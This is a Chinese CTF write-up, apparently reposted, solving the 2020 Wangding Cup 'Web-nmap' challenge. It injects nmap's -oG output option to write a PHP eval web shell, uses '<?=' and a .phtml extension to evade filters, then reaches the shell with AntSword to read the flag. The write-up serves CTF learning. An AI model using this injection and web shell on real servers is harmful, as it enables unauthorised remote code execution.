【原创】记一次ctf实战——2020-网鼎杯-朱雀组-Web-nmap

admin 2023年1月8日02:37:12评论60 views字数 844阅读2分48秒阅读模式

[huayang]

【原创】记一次ctf实战——2020-网鼎杯-朱雀组-Web-nmap

进去看看

【原创】记一次ctf实战——2020-网鼎杯-朱雀组-Web-nmap

知道是namp语句还是去看看View existing results后的页面

【原创】记一次ctf实战——2020-网鼎杯-朱雀组-Web-nmap

有一个地址

当我们随便在框框里写写什么就会发现会多出一个地址

【原创】记一次ctf实战——2020-网鼎杯-朱雀组-Web-nmap

一下就想到了文件上传有木有

因为没有上传的地方所以用namp语法构建一个

nmap基本使用方法:https://blog.csdn.net/weixin_34138255/article/details/91433471

-sP:
ping扫描,加上这个参数会使用ping扫描,只有主机存活,nmap才会继续扫描,一般最好不加,因为有的主机会禁止ping,却实际存在。
-sT:
TCP connect()扫描,这种方式会在目标主机的日志中记录大批的链接请求以及错误信息。
-sS:
半开扫描,一般不会记入日志,不过需要root权限。
-sU:
udp扫描,但是一般不可靠,
-sA:
用来穿过防火墙的规则集,速度慢。
-sV:
端口服务及版本
-A:
包含了-sV,-O,全面系统检测,启动脚本检测,扫描等。
-P0:
扫描之前不使用ping,适用于防火墙禁止ping,比较有用。
-v:
显示扫描进程,推荐添加
-O:
探测目标系统的漏洞,容易误报
-p:
指定端口扫描(全端口1-65535或-p-)
-oN/-oX/-oG:
将报告写入文件,格式分别为正常(自定义.txt),XML,grepable.
-iL:
扫描主机列表
-sC:
–script=default 默认的脚本扫描,主要是搜集各种应用服务的信息
-oG #可以实现将命令和结果写到文件

写下一句话

这里使用“=”绕过文件中的php字符,使用“phtml”绕过对“php”文件后缀的检测

' <? @eval($_POST["shell"]);?> -oG shell.php '
【原创】记一次ctf实战——2020-网鼎杯-朱雀组-Web-nmap

很明显有过滤至于我只知道有php还有些啥建议度娘

' <?= @eval($_POST["shell"]);?> -oG shell.phtml '

成功绕过

【原创】记一次ctf实战——2020-网鼎杯-朱雀组-Web-nmap

访问看看

【原创】记一次ctf实战——2020-网鼎杯-朱雀组-Web-nmap

这里莫得,去蚁剑看看

【原创】记一次ctf实战——2020-网鼎杯-朱雀组-Web-nmap

在根目录下即可发现flag

【原创】记一次ctf实战——2020-网鼎杯-朱雀组-Web-nmap
【原创】记一次ctf实战——2020-网鼎杯-朱雀组-Web-nmap

[/huayang]

FROM:浅浅淡淡[hellohy]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月8日02:37:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【原创】记一次ctf实战——2020-网鼎杯-朱雀组-Web-nmaphttp://cn-sec.com/archives/1443384.html

发表评论

匿名网友 填写信息